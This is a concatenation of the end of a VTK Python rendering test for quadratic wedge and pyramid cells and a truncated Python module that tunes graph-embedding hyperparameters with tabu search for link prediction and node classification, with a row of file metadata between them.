aWedge.GetPointIds().SetId(14, 14)
aWedgeGrid = vtk.vtkUnstructuredGrid()
aWedgeGrid.Allocate(1, 1)
aWedgeGrid.InsertNextCell(aWedge.GetCellType(), aWedge.GetPointIds())
aWedgeGrid.SetPoints(wedgePoints)
aWedgeGrid.GetPointData().SetScalars(wedgeScalars)
wedgeclips = vtk.vtkClipDataSet()
wedgeclips.SetInputData(aWedgeGrid)
wedgeclips.SetValue(0.5)
aWedgeclipMapper = vtk.vtkDataSetMapper()
aWedgeclipMapper.SetInputConnection(wedgeclips.GetOutputPort())
aWedgeclipMapper.ScalarVisibilityOff()
aWedgeMapper = vtk.vtkDataSetMapper()
aWedgeMapper.SetInputData(aWedgeGrid)
aWedgeMapper.ScalarVisibilityOff()
aWedgeActor = vtk.vtkActor()
aWedgeActor.SetMapper(aWedgeMapper)
aWedgeActor.GetProperty().SetRepresentationToWireframe()
aWedgeActor.GetProperty().SetAmbient(1.0)
aWedgeclipActor = vtk.vtkActor()
aWedgeclipActor.SetMapper(aWedgeclipMapper)
aWedgeclipActor.GetProperty().SetAmbient(1.0)
# Quadratic linear wedge
QLwedgePoints = vtk.vtkPoints()
QLwedgePoints.SetNumberOfPoints(12)
QLwedgePoints.InsertPoint(0, 0, 0, 0)
QLwedgePoints.InsertPoint(1, 1, 0, 0)
QLwedgePoints.InsertPoint(2, 0, 1, 0)
QLwedgePoints.InsertPoint(3, 0, 0, 1)
QLwedgePoints.InsertPoint(4, 1, 0, 1)
QLwedgePoints.InsertPoint(5, 0, 1, 1)
QLwedgePoints.InsertPoint(6, 0.5, 0, 0)
QLwedgePoints.InsertPoint(7, 0.5, 0.5, 0)
QLwedgePoints.InsertPoint(8, 0, 0.5, 0)
QLwedgePoints.InsertPoint(9, 0.5, 0, 1)
QLwedgePoints.InsertPoint(10, 0.5, 0.5, 1)
QLwedgePoints.InsertPoint(11, 0, 0.5, 1)
QLwedgeScalars = vtk.vtkFloatArray()
QLwedgeScalars.SetNumberOfTuples(12)
QLwedgeScalars.InsertValue(0, 1.0)
QLwedgeScalars.InsertValue(1, 1.0)
QLwedgeScalars.InsertValue(2, 1.0)
QLwedgeScalars.InsertValue(3, 1.0)
QLwedgeScalars.InsertValue(4, 1.0)
QLwedgeScalars.InsertValue(5, 1.0)
QLwedgeScalars.InsertValue(6, 0.0)
QLwedgeScalars.InsertValue(7, 0.0)
QLwedgeScalars.InsertValue(8, 0.0)
QLwedgeScalars.InsertValue(9, 0.0)
QLwedgeScalars.InsertValue(10, 0.0)
QLwedgeScalars.InsertValue(11, 0.0)
QLWedge = vtk.vtkQuadraticLinearWedge()
QLWedge.GetPointIds().SetId(0, 0)
QLWedge.GetPointIds().SetId(1, 1)
QLWedge.GetPointIds().SetId(2, 2)
QLWedge.GetPointIds().SetId(3, 3)
QLWedge.GetPointIds().SetId(4, 4)
QLWedge.GetPointIds().SetId(5, 5)
QLWedge.GetPointIds().SetId(6, 6)
QLWedge.GetPointIds().SetId(7, 7)
QLWedge.GetPointIds().SetId(8, 8)
QLWedge.GetPointIds().SetId(9, 9)
QLWedge.GetPointIds().SetId(10, 10)
QLWedge.GetPointIds().SetId(11, 11)
# QLaWedge DebugOn
QLWedgeGrid = vtk.vtkUnstructuredGrid()
QLWedgeGrid.Allocate(1, 1)
QLWedgeGrid.InsertNextCell(QLWedge.GetCellType(), QLWedge.GetPointIds())
QLWedgeGrid.SetPoints(QLwedgePoints)
QLWedgeGrid.GetPointData().SetScalars(QLwedgeScalars)
QLwedgeclips = vtk.vtkClipDataSet()
QLwedgeclips.SetInputData(QLWedgeGrid)
QLwedgeclips.SetValue(0.5)
QLWedgeclipMapper = vtk.vtkDataSetMapper()
QLWedgeclipMapper.SetInputConnection(QLwedgeclips.GetOutputPort())
QLWedgeclipMapper.ScalarVisibilityOff()
QLWedgeMapper = vtk.vtkDataSetMapper()
QLWedgeMapper.SetInputData(QLWedgeGrid)
QLWedgeMapper.ScalarVisibilityOff()
QLWedgeActor = vtk.vtkActor()
QLWedgeActor.SetMapper(QLWedgeMapper)
QLWedgeActor.GetProperty().SetRepresentationToWireframe()
QLWedgeActor.GetProperty().SetAmbient(1.0)
QLWedgeclipActor = vtk.vtkActor()
QLWedgeclipActor.SetMapper(QLWedgeclipMapper)
QLWedgeclipActor.GetProperty().SetAmbient(1.0)
# BiQuadratic wedge
BQwedgePoints = vtk.vtkPoints()
BQwedgePoints.SetNumberOfPoints(18)
BQwedgePoints.InsertPoint(0, 0, 0, 0)
BQwedgePoints.InsertPoint(1, 1, 0, 0)
BQwedgePoints.InsertPoint(2, 0, 1, 0)
BQwedgePoints.InsertPoint(3, 0, 0, 1)
BQwedgePoints.InsertPoint(4, 1, 0, 1)
BQwedgePoints.InsertPoint(5, 0, 1, 1)
BQwedgePoints.InsertPoint(6, 0.5, 0, 0)
BQwedgePoints.InsertPoint(7, 0.5, 0.5, 0)
BQwedgePoints.InsertPoint(8, 0, 0.5, 0)
BQwedgePoints.InsertPoint(9, 0.5, 0, 1)
BQwedgePoints.InsertPoint(10, 0.5, 0.5, 1)
BQwedgePoints.InsertPoint(11, 0, 0.5, 1)
BQwedgePoints.InsertPoint(12, 0, 0, 0.5)
BQwedgePoints.InsertPoint(13, 1, 0, 0.5)
BQwedgePoints.InsertPoint(14, 0, 1, 0.5)
BQwedgePoints.InsertPoint(15, 0.5, 0, 0.5)
BQwedgePoints.InsertPoint(16, 0.5, 0.5, 0.5)
BQwedgePoints.InsertPoint(17, 0, 0.5, 0.5)
BQwedgeScalars = vtk.vtkFloatArray()
BQwedgeScalars.SetNumberOfTuples(18)
BQwedgeScalars.InsertValue(0, 1.0)
BQwedgeScalars.InsertValue(1, 1.0)
BQwedgeScalars.InsertValue(2, 1.0)
BQwedgeScalars.InsertValue(3, 1.0)
BQwedgeScalars.InsertValue(4, 1.0)
BQwedgeScalars.InsertValue(5, 1.0)
BQwedgeScalars.InsertValue(6, 0.0)
BQwedgeScalars.InsertValue(7, 0.0)
BQwedgeScalars.InsertValue(8, 0.0)
BQwedgeScalars.InsertValue(9, 0.0)
BQwedgeScalars.InsertValue(10, 0.0)
BQwedgeScalars.InsertValue(11, 0.0)
BQwedgeScalars.InsertValue(12, 0.0)
BQwedgeScalars.InsertValue(13, 0.0)
BQwedgeScalars.InsertValue(14, 0.0)
BQwedgeScalars.InsertValue(15, 0.0)
BQwedgeScalars.InsertValue(16, 0.0)
BQwedgeScalars.InsertValue(17, 0.0)
BQWedge = vtk.vtkBiQuadraticQuadraticWedge()
BQWedge.GetPointIds().SetId(0, 0)
BQWedge.GetPointIds().SetId(1, 1)
BQWedge.GetPointIds().SetId(2, 2)
BQWedge.GetPointIds().SetId(3, 3)
BQWedge.GetPointIds().SetId(4, 4)
BQWedge.GetPointIds().SetId(5, 5)
BQWedge.GetPointIds().SetId(6, 6)
BQWedge.GetPointIds().SetId(7, 7)
BQWedge.GetPointIds().SetId(8, 8)
BQWedge.GetPointIds().SetId(9, 9)
BQWedge.GetPointIds().SetId(10, 10)
BQWedge.GetPointIds().SetId(11, 11)
BQWedge.GetPointIds().SetId(12, 12)
BQWedge.GetPointIds().SetId(13, 13)
BQWedge.GetPointIds().SetId(14, 14)
BQWedge.GetPointIds().SetId(15, 15)
BQWedge.GetPointIds().SetId(16, 16)
BQWedge.GetPointIds().SetId(17, 17)
# BQWedge DebugOn
BQWedgeGrid = vtk.vtkUnstructuredGrid()
BQWedgeGrid.Allocate(1, 1)
BQWedgeGrid.InsertNextCell(BQWedge.GetCellType(), BQWedge.GetPointIds())
BQWedgeGrid.SetPoints(BQwedgePoints)
BQWedgeGrid.GetPointData().SetScalars(BQwedgeScalars)
BQwedgeclips = vtk.vtkClipDataSet()
BQwedgeclips.SetInputData(BQWedgeGrid)
BQwedgeclips.SetValue(0.5)
BQWedgeclipMapper = vtk.vtkDataSetMapper()
BQWedgeclipMapper.SetInputConnection(BQwedgeclips.GetOutputPort())
BQWedgeclipMapper.ScalarVisibilityOff()
BQWedgeMapper = vtk.vtkDataSetMapper()
BQWedgeMapper.SetInputData(BQWedgeGrid)
BQWedgeMapper.ScalarVisibilityOff()
BQWedgeActor = vtk.vtkActor()
BQWedgeActor.SetMapper(BQWedgeMapper)
BQWedgeActor.GetProperty().SetRepresentationToWireframe()
BQWedgeActor.GetProperty().SetAmbient(1.0)
BQWedgeclipActor = vtk.vtkActor()
BQWedgeclipActor.SetMapper(BQWedgeclipMapper)
BQWedgeclipActor.GetProperty().SetAmbient(1.0)
# Quadratic pyramid
pyraPoints = vtk.vtkPoints()
pyraPoints.SetNumberOfPoints(13)
pyraPoints.InsertPoint(0, 0, 0, 0)
pyraPoints.InsertPoint(1, 1, 0, 0)
pyraPoints.InsertPoint(2, 1, 1, 0)
pyraPoints.InsertPoint(3, 0, 1, 0)
pyraPoints.InsertPoint(4, 0, 0, 1)
pyraPoints.InsertPoint(5, 0.5, 0, 0)
pyraPoints.InsertPoint(6, 1, 0.5, 0)
pyraPoints.InsertPoint(7, 0.5, 1, 0)
pyraPoints.InsertPoint(8, 0, 0.5, 0)
pyraPoints.InsertPoint(9, 0, 0, 0.5)
pyraPoints.InsertPoint(10, 0.5, 0, 0.5)
pyraPoints.InsertPoint(11, 0.5, 0.5, 0.5)
pyraPoints.InsertPoint(12, 0, 0.5, 0.5)
pyraScalars = vtk.vtkFloatArray()
pyraScalars.SetNumberOfTuples(13)
pyraScalars.InsertValue(0, 1.0)
pyraScalars.InsertValue(1, 1.0)
pyraScalars.InsertValue(2, 1.0)
pyraScalars.InsertValue(3, 1.0)
pyraScalars.InsertValue(4, 1.0)
pyraScalars.InsertValue(5, 0.0)
pyraScalars.InsertValue(6, 0.0)
pyraScalars.InsertValue(7, 0.0)
pyraScalars.InsertValue(8, 0.0)
pyraScalars.InsertValue(9, 0.0)
pyraScalars.InsertValue(10, 0.0)
pyraScalars.InsertValue(11, 0.0)
pyraScalars.InsertValue(12, 0.0)
aPyramid = vtk.vtkQuadraticPyramid()
aPyramid.GetPointIds().SetId(0, 0)
aPyramid.GetPointIds().SetId(1, 1)
aPyramid.GetPointIds().SetId(2, 2)
aPyramid.GetPointIds().SetId(3, 3)
aPyramid.GetPointIds().SetId(4, 4)
aPyramid.GetPointIds().SetId(5, 5)
aPyramid.GetPointIds().SetId(6, 6)
aPyramid.GetPointIds().SetId(7, 7)
aPyramid.GetPointIds().SetId(8, 8)
aPyramid.GetPointIds().SetId(9, 9)
aPyramid.GetPointIds().SetId(10, 10)
aPyramid.GetPointIds().SetId(11, 11)
aPyramid.GetPointIds().SetId(12, 12)
aPyramidGrid = vtk.vtkUnstructuredGrid()
aPyramidGrid.Allocate(1, 1)
aPyramidGrid.InsertNextCell(aPyramid.GetCellType(), aPyramid.GetPointIds())
aPyramidGrid.SetPoints(pyraPoints)
aPyramidGrid.GetPointData().SetScalars(pyraScalars)
pyraclips = vtk.vtkClipDataSet()
pyraclips.SetInputData(aPyramidGrid)
pyraclips.SetValue(0.5)
aPyramidclipMapper = vtk.vtkDataSetMapper()
aPyramidclipMapper.SetInputConnection(pyraclips.GetOutputPort())
aPyramidclipMapper.ScalarVisibilityOff()
aPyramidMapper = vtk.vtkDataSetMapper()
aPyramidMapper.SetInputData(aPyramidGrid)
aPyramidMapper.ScalarVisibilityOff()
aPyramidActor = vtk.vtkActor()
aPyramidActor.SetMapper(aPyramidMapper)
aPyramidActor.GetProperty().SetRepresentationToWireframe()
aPyramidActor.GetProperty().SetAmbient(1.0)
aPyramidclipActor = vtk.vtkActor()
aPyramidclipActor.SetMapper(aPyramidclipMapper)
aPyramidclipActor.GetProperty().SetAmbient(1.0)
# Create the rendering related stuff.
# Since some of our actors are a single vertex, we need to remove all
# cullers so the single vertex actors will render
ren1 = vtk.vtkRenderer()
ren1.GetCullers().RemoveAllItems()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
ren1.SetBackground(.1, .2, .3)
renWin.SetSize(400, 200)
# specify properties
ren1.AddActor(aEdgeActor)
ren1.AddActor(aEdgeclipActor)
ren1.AddActor(aTriActor)
ren1.AddActor(aTriclipActor)
ren1.AddActor(aQuadActor)
ren1.AddActor(aQuadclipActor)
ren1.AddActor(BQuadActor)
ren1.AddActor(BQuadclipActor)
ren1.AddActor(QLQuadActor)
ren1.AddActor(QLQuadclipActor)
ren1.AddActor(aTetActor)
ren1.AddActor(aTetclipActor)
ren1.AddActor(aHexActor)
ren1.AddActor(aHexclipActor)
ren1.AddActor(TQHexActor)
ren1.AddActor(TQHexclipActor)
ren1.AddActor(BQHexActor)
ren1.AddActor(BQHexclipActor)
ren1.AddActor(aWedgeActor)
ren1.AddActor(aWedgeclipActor)
ren1.AddActor(BQWedgeActor)
ren1.AddActor(BQWedgeclipActor)
ren1.AddActor(QLWedgeActor)
ren1.AddActor(QLWedgeclipActor)
ren1.AddActor(aPyramidActor)
ren1.AddActor(aPyramidclipActor)
# places everyone!!
aEdgeclipActor.AddPosition(0, 2, 0)
aTriActor.AddPosition(2, 0, 0)
aTriclipActor.AddPosition(2, 2, 0)
aQuadActor.AddPosition(4, 0, 0)
BQuadActor.AddPosition(4, 0, 2)
QLQuadActor.AddPosition(4, 0, 4)
aQuadclipActor.AddPosition(4, 2, 0)
BQuadclipActor.AddPosition(4, 2, 2)
QLQuadclipActor.AddPosition(4, 2, 4)
aTetActor.AddPosition(6, 0, 0)
aTetclipActor.AddPosition(6, 2, 0)
aHexActor.AddPosition(8, 0, 0)
TQHexActor.AddPosition(8, 0, 2)
BQHexActor.AddPosition(8, 0, 4)
aHexclipActor.AddPosition(8, 2, 0)
TQHexclipActor.AddPosition(8, 2, 2)
BQHexclipActor.AddPosition(8, 2, 4)
aWedgeActor.AddPosition(10, 0, 0)
QLWedgeActor.AddPosition(10, 0, 2)
BQWedgeActor.AddPosition(10, 0, 4)
aWedgeclipActor.AddPosition(10, 2, 0)
QLWedgeclipActor.AddPosition(10, 2, 2)
BQWedgeclipActor.AddPosition(10, 2, 4)
aPyramidActor.AddPosition(12, 0, 0)
aPyramidclipActor.AddPosition(12, 2, 0)
[base, back, left] = backdrop.BuildBackdrop(-1, 15, -1, 4, -1, 6, .1)
ren1.AddActor(base)
base.GetProperty().SetDiffuseColor(.2, .2, .2)
ren1.AddActor(left)
left.GetProperty().SetDiffuseColor(.2, .2, .2)
ren1.AddActor(back)
back.GetProperty().SetDiffuseColor(.2, .2, .2)
ren1.ResetCamera()
ren1.GetActiveCamera().Dolly(2.5)
ren1.ResetCameraClippingRange()
renWin.Render()
# render the image
#
iren.Initialize()
#iren.Start()
| 34.555888 | 75 | 0.784087 |
4a27e20dab5555f7c75a799cc1fb9c0fada4d32a | 24,018 | py | Python | tuning.py | droully/Graph-Embedding | 820ee2bcb57c7883dc41bec6da0e12222a537331 | [
"BSD-3-Clause"
] | null | null | null | tuning.py | droully/Graph-Embedding | 820ee2bcb57c7883dc41bec6da0e12222a537331 | [
"BSD-3-Clause"
] | null | null | null | tuning.py | droully/Graph-Embedding | 820ee2bcb57c7883dc41bec6da0e12222a537331 | [
"BSD-3-Clause"
] | null | null | null | #%%
"""imports"""
import itertools
import os
import pickle
import random
import time
import matplotlib.pyplot as plt
import networkx as nx
import numpy as np
import pandas as pd
from openne.models import gae, gf, grarep, lap, line, lle, node2vec, sdne, vgae
from tqdm import tqdm
from evalne.evaluation.evaluator import LPEvaluator, NCEvaluator
from evalne.evaluation.score import Scoresheet
from evalne.evaluation.split import EvalSplit
from evalne.utils import preprocess as pp
from openne.dataloaders import Graph, create_self_defined_dataset
# %%
"""
users = pickle.load(open("data/users.p", "rb"))
visits = pickle.load(open("data/visits.p", "rb"))
props = pickle.load(open("data/props.p", "rb"))
grafos = pickle.load(open("data/grafos.p", "rb"))
grafos_test = pickle.load(open("data/grafos_test.p", "rb"))
nodesnuevos=[n for n in grafos_test.B_f if n not in grafos.B_f]
grafos_test.B_f.remove_nodes_from(nodesnuevos)
edgesnuevos=[e for e in grafos_test.B_f.edges if e not in grafos.B_f.edges]
grafos_test.B_f.remove_edges_from(list(grafos_test.B.edges))
grafos_test.B_f.add_edges_from(edgesnuevos)
grafos.set_features("users",mode="adj")
grafos.set_features("props",mode="adj")
grafos.set_features("bipartite",mode="adj")
"""
# %%
class Tuning:
r"""
    General training class
"""
def __init__(self,G,root):
self.tipo = G.graph["tipo"]
self.root = root
self.methods_modules_dict = {
"line": line.LINE, "node2vec": node2vec.Node2vec,"gf":gf.GraphFactorization,"lap":lap.LaplacianEigenmaps,
"sdne": sdne.SDNE,"lle":lle.LLE,"grarep":grarep.GraRep,"gae":gae.GAE,"vgae":vgae.VGAE}
self.method_dims_dict = {"line": "dim","gf": "dim", "node2vec": "dim", "lap":"dim","sdne":"encoder_layer_list","lle":"dim",
"grarep":'dim',"gae":"output_dim","vgae":"output_dim"}
self.methods_params_names_dict = {"line": ["dim", "negative_ratio","lr"],
"node2vec": ["dim", "path_length", "num_paths", "p", "q"],
"gf":["dim"],
"lap":["dim"],
"sdne":["encoder_layer_list","alpha", "beta", "nu1","nu2"],
"lle":["dim"],
'grarep':["dim","kstep"],
'gae':["output_dim","hiddens","max_degree"],
'vgae':["output_dim","hiddens","max_degree"]
}
self.methods_params_types_dict = {"line": {"dim": "nat", "negative_ratio": "nat","lr":"ratio"},
"node2vec": {"dim": "nat", "path_length": "nat", "num_paths": "nat", "p": "ratio", "q": "ratio"},
"gf":{"dim":"nat"},
"lap":{"dim":"nat"},
"sdne":{"encoder_layer_list":"ratio","alpha":"ratio", "beta":"gtone", "nu1":"ratio","nu2": "ratio"},
"lle":{"dim":"nat"},
"grarep":{"dim":"nat","kstep":"nat"},
'gae':{"output_dim":"nat","hiddens":"ratio","max_degree":"nat"},
'vgae':{"output_dim":"nat","hiddens":"ratio","max_degree":"nat"}
}
self.training_graph =None
self.test_graph= None
self.labels = np.array([[node,attrs["label"][0]] for node, attrs in G.nodes(data=True)])
self.task=None
self.scoresheet=Scoresheet()
self.evaluator=None
self.method=None
def score(self, method_name,edge_method="hadamard"):
r"""
        Method that returns the metric stored in the scoresheet: weighted F1 for NC, AUROC for LP.
        Parameters
        ----------
        method_name: str
            name of the method
        edge_method: str
            edge embedding method: "l1", "l2", "hadamard", "average"
"""
if self.task=="nc":
return np.mean(self.scoresheet._scoresheet["GPI"][method_name+"_0.8"]["f1_weighted"])
if self.task=="lp":
dic_edge_method={"l1":0,"l2":1,"hadamard":2,"average":3}
# ['weighted_l1', 'weighted_l2', 'hadamard', 'average']
return np.mean(self.scoresheet._scoresheet["GPI"][method_name]["auroc"][dic_edge_method[edge_method]])
def time(self, method_name):
r"""
        Method that returns the evaluation time stored in the scoresheet.
        Parameters
        ----------
        method_name: str
            name of the method
"""
if self.task=="nc":
return self.scoresheet._scoresheet["GPI"][method_name+"_0.8"]['eval_time'][0]
if self.task=="lp":
# ['weighted_l1', 'weighted_l2', 'hadamard', 'average']
return self.scoresheet._scoresheet["GPI"][method_name]["eval_time"][0]
def HCgen(self, seed, scale):
r"""
        Neighbour generator for hill climbing.
        Parameters
        ----------
        seed: dict
            seed dictionary, where keys are the parameter names and values their current values
        scale: dict
            scale dictionary, where keys are the parameter names and values how much to
            add/subtract or multiply/divide by
"""
aux = seed.copy()
yield aux
for k, v in seed.items():
if k not in scale:
continue
if self.methods_params_types_dict[self.method][k] == "nat":
aux.update({k: v+scale[k]})
yield aux
aux = seed.copy()
if v-scale[k] > 0:
aux.update({k: v-scale[k]})
yield aux
aux = seed.copy()
if self.methods_params_types_dict[self.method][k] == "ratio":
aux.update({k: v*scale[k]})
yield aux
aux = seed.copy()
aux.update({k: v/scale[k]})
yield aux
aux = seed.copy()
if self.methods_params_types_dict[self.method][k] == "gtone":
aux.update({k: v+scale[k]})
yield aux
aux = seed.copy()
if v-scale[k] > 1:
aux.update({k: v-scale[k]})
yield aux
aux = seed.copy()
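    # A minimal sketch of what HCgen yields (hypothetical values; assumes
    # self.method == "node2vec", so "num_paths" is of type "nat" and "p" is "ratio"):
    #   seed  = {"num_paths": 10, "p": 0.1}
    #   scale = {"num_paths": 5,  "p": 10}
    #   -> {"num_paths": 10, "p": 0.1}   (the seed itself)
    #      {"num_paths": 15, "p": 0.1}, {"num_paths": 5, "p": 0.1}
    #      {"num_paths": 10, "p": 1.0}, {"num_paths": 10, "p": 0.01}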
def TestModel(self,*args):
return 0
def TrainModel(self, method, d, savefile=None, **kwargs):
r"""
        Trains an embedding model using a method provided by OpenNE.
        IMPORTANT NOTE:
        some models take their hyper-parameters when the instance is created:
        model = whatever(parameter)
        and others when the embeddings are computed: vectors = model(parameter)
        which case applies depends on the method and on the parameter!!! (OpenNE's fault)
        Parameters
        ----------
        method: str
            Embedding method to use; one of "line", "node2vec", "gf", "lap", "sdne", "lle", "grarep", "gae", "vgae".
        d: int
            Embedding dimension.
        savefile: str
            Path where the embedding is saved; if None it is not saved.
        **kwargs: dict
            Parameters for the method.
        Returns
        -------
        emb: dict
            Dictionary whose keys are the nodes and whose values are their embeddings.
        time: float
            Training time.
"""
start = time.time()
if method=="node2vec" and not nx.is_directed(self.training_graph.G) :
dictostr = {node: str(node) for node in self.training_graph.G}
self.training_graph.G = nx.relabel_nodes(self.training_graph.G, dictostr)
self.training_graph.G = self.training_graph.G.to_directed()
model = self.methods_modules_dict[method](dim=d,save=False, **kwargs)
vectors = model(self.training_graph,**kwargs)
dictoint = {node: int(node) for node in self.training_graph.G}
self.training_graph.G = nx.relabel_nodes(self.training_graph.G, dictoint)
self.training_graph.G = self.training_graph.G.to_undirected()
elif method=="grarep":
model = self.methods_modules_dict[method](kstep=kwargs["kstep"],dim=d,save=False)
vectors = model(self.training_graph,dim=d,**kwargs)
elif method=="gae" or method=="vgae" :
kwargs["hiddens"]=[int(kwargs["hiddens"])]
model = self.methods_modules_dict[method](output_dim=d,dim=d,save=False,**kwargs)
vectors = model(self.training_graph,epochs=kwargs["epochs"])
elif method=="sdne":
kwargs["encoder_layer_list"]=[int(kwargs["encoder_layer_list"]),d]
model = self.methods_modules_dict[method](**kwargs,save=False)
vectors = model(self.training_graph,**kwargs)
else:
model = self.methods_modules_dict[method](dim=d,save=False, **kwargs)
vectors = model(self.training_graph,**kwargs)
end = time.time()
emb = {str(k): np.array(v) for k, v in vectors.items()}
if savefile is not None:
model.save_embeddings(savefile)
return emb, end-start
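    # Minimal usage sketch (hypothetical tuner/graph objects; the keyword names follow
    # self.methods_params_names_dict for each method):
    #   emb, elapsed = tuner.TrainModel("line", 128, negative_ratio=5, lr=0.025, epochs=10)
    #   vector = emb[str(some_node)]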
def TabuSearchParams(self, method, dim, seed={}, scale={}, iters=2, tabu_lenght=2, **kwargs):
r"""
        Searches for the best hyper-parameters of a model using a tabu list.
        Parameters
        ----------
        method: str
            Embedding method to use; one of "line", "node2vec", "gf", "lap", "sdne", "lle", "grarep", "gae", "vgae".
        dim: int
            Embedding dimension.
        seed: dict
            Dictionary with the hyper-parameters the search starts from; keys are the names and values their values
        scale: dict
            Dictionary with the scale of each hyper-parameter, used to generate its neighbours
        iters: int
            Number of tabu-search iterations
        tabu_lenght: int
            Length of the tabu list
        **kwargs: dict
            Extra model parameters that will not be tuned
"""
self.method = method
self.path = "{}{}/{}/".format(self.root, self.tipo, self.method)
os.makedirs(self.path, exist_ok=True)
scorehist = pd.DataFrame(columns=self.methods_params_names_dict[self.method]+['f1'])
if self.method in ["gf", "lap", "lle"]:
iters=1
if self.method=="node2vec":
dictostr = {node: str(node) for node in self.training_graph.G}
self.training_graph.G = nx.relabel_nodes(self.training_graph.G, dictostr)
self.training_graph.G = self.training_graph.G.to_directed()
try:
self.scoresheet = pickle.load(open(self.path+"scorenc", "rb"))
except:
self.scoresheet = Scoresheet()
tabu_list = tabu_lenght*[" "]
best = seed
best_score=0
bestCandidate = seed
bestCandidateValues = tuple(bestCandidate.values())
#tabu_list.append(bestCandidateValues)
#tabu_list = tabu_list[1:]
score_dict = {(-1,): 0}
for _ in range(iters):
bestCandidate_ = bestCandidate
bestCandidate = {"dummy": -1}
bestCandidateValues=tuple(bestCandidate.values())
bestCandidateScore=score_dict[bestCandidateValues]
for candidate in self.HCgen(bestCandidate_, scale):
candidateValues = tuple(candidate.values())
params_str = " {:n}"*(len(candidateValues)+1)
params_str = params_str.format(dim, *candidateValues)
params_str=params_str[1:]
method_name ="{} {}".format(self.method,params_str)
try:
score_dict.update({candidateValues: self.score(method_name)})
except:
args = candidate.copy()
args.update(kwargs)
emb,time=self.TrainModel(self.method, dim, self.path+params_str+".txt", **args)
res = self.TestModel(emb,time, method_name)
#self.scoresheet.log_results(res)
self.scoresheet.write_pickle(self.path+"scorenc")
try:
os.remove(self.path+"scorenc.txt")
except:
pass
self.scoresheet.write_all(self.path+"scorenc.txt",repeats="all")
score_dict.update({candidateValues: self.score(method_name)})
if (candidateValues not in tabu_list) and (score_dict[candidateValues] >= bestCandidateScore):
bestCandidate = candidate.copy()
bestCandidateValues=tuple(bestCandidate.values())
bestCandidateScore=score_dict[tuple(bestCandidate.values())]
scorehist = scorehist.append({**{self.method_dims_dict[self.method]:dim}, **bestCandidate, **{"f1": bestCandidateScore}}, ignore_index=True)
if score_dict[bestCandidateValues] > best_score:
best = bestCandidate
best_score = score_dict[tuple(best.values())]
tabu_list.append(bestCandidateValues)
tabu_list = tabu_list[1:]
types2format = {"nat": '%d',"gtone": '%d', "ratio": '%E'}
fmt = [types2format[self.methods_params_types_dict[self.method][v]]
for v in self.methods_params_names_dict[self.method]]+['%1.6f']
np.savetxt(self.path+str(dim)+" scorehist.txt",scorehist.values, fmt=fmt)
if self.method=="node2vec":
dictoint = {node: int(node) for node in self.training_graph.G}
self.training_graph.G = nx.relabel_nodes(self.training_graph.G, dictoint)
self.training_graph.G = self.training_graph.G.to_undirected()
bestvalues=tuple(best.values())
params_str = " {:n}"*(len(bestvalues)+1)
params_str = params_str.format(dim, *bestvalues)
params_str=params_str[1:]
best_method_name="{} {}".format(self.method,params_str)
best_time= self.time(best_method_name)
if self.task=="nc":
return best, best_score, best_time
if self.task=="lp":
best_l1=self.score(best_method_name,edge_method="l1")
best_l2=self.score(best_method_name,edge_method="l2")
best_hadamard=self.score(best_method_name,edge_method="hadamard")
best_average=self.score(best_method_name,edge_method="average")
return best, best_l1, best_l2, best_hadamard, best_average, best_time
class LinkPredictionTuning(Tuning):
r"""
    General class for training and testing graph embeddings on the link prediction task.
    Parameters
    ----------
    G: NetworkX graph
        Training graph.
    G_test: NetworkX graph
        Test graph.
    root: str
        directory where the results will be saved
"""
def __init__(self, G,G_test, root="results/lp/"):
super(LinkPredictionTuning, self).__init__(G, root=root)
self.task="lp"
train_E=G.edges
train_E_false=self.GetNegativeEdges(G,len(train_E))
test_E=G_test.edges
test_E_false=self.GetNegativeEdges(G_test,len(test_E))
self.split = EvalSplit()
self.split.set_splits(train_E, train_E_false=train_E_false, test_E=test_E, test_E_false=test_E_false, TG=G)
self.training_graph = create_self_defined_dataset(root_dir="",name_dict={},name="training "+self.tipo, weighted=True, directed=False, attributed=True)()
self.training_graph.set_g(G)
self.evaluator = LPEvaluator(self.split)
def GetNegativeEdges(self, G, n):
r"""
        Helper method that samples negative edges.
        Parameters
        ----------
        G: NetworkX graph
            Bipartite graph.
        n: int
            number of edges to sample.
"""
prop_nodes=[n for n, d in G.nodes(data=True) if d['bipartite']==0]
user_nodes=[n for n, d in G.nodes(data=True) if d['bipartite']==1]
non_edges=[]
while len(non_edges) <=n:
random_prop = random.choice(prop_nodes)
random_user = random.choice(user_nodes)
edge=(random_prop,random_user)
if G.has_edge(*edge):
continue
else:
non_edges.append(edge)
return non_edges
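    # Note: the sampling loop above uses "<= n", so slightly more than n negative pairs
    # may be returned, and pairs can repeat since sampling is with replacement.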
def TestModel(self, emb,time=-1, method_name="method_name"):
r"""
        Tests an embedding and logs it in the scoresheet.
        Parameters
        ----------
        emb: dict
            embedding dictionary; keys are the nodes and values a list with the embedding
        time: float
            running time of the method, stored in the scoresheet
        method_name: str
            name under which the method is stored.
"""
df = pd.DataFrame(emb).T
X = df.T.to_dict("list")
        X = {str(k): np.array(v) for k, v in X.items()}  # must be an array because sums are performed on it
self.evaluator.dim=df.shape[1]
reslp=[]
for edge_method in ["weighted_l1","weighted_l2","hadamard","average"]:
            # TODO: avoid evaluating all 4 edge-embedding methods
res = self.evaluator.evaluate_ne(self.split, X=X,method=method_name,edge_embed_method=edge_method,params={"nw_name":"GPI"})
res.params.update({'eval_time': time})
reslp.append(res)
self.scoresheet.log_results(reslp)
return reslp
class NodeClassificationTuning(Tuning):
r"""
    General class for training and testing graph embeddings on the node classification task.
    Parameters
    ----------
    G: NetworkX graph
        Graph.
    root: str
        directory where the results will be saved
"""
def __init__(self, G, root="results/nc/",**kwargs):
super(NodeClassificationTuning, self).__init__(G, root=root)
self.task="nc"
self.training_graph=create_self_defined_dataset(root_dir="",name_dict={},name="test "+self.tipo, weighted=True, directed=False, attributed=True)()
self.training_graph.set_g(G)
self.evaluator = NCEvaluator(self.training_graph.G, self.labels, nw_name="GPI",
num_shuffles=5, traintest_fracs=[0.8], trainvalid_frac=0)
def TestModel(self, emb,time=-1, method_name="method_name"):
r"""
        Tests an embedding and logs it in the scoresheet.
        Parameters
        ----------
        emb: dict
            embedding dictionary; keys are the nodes and values a list with the embedding
        time: float
            running time of the method, stored in the scoresheet
        method_name: str
            name under which the method is stored.
"""
df = pd.DataFrame(emb).T
X = df.T.to_dict("list")
        X = {str(k): np.array(v) for k, v in X.items()}  # must be an array because vector sums are performed on it
self.evaluator.dim=df.shape[1]
resnc = self.evaluator.evaluate_ne(X=X, method_name=method_name)
for res in resnc:
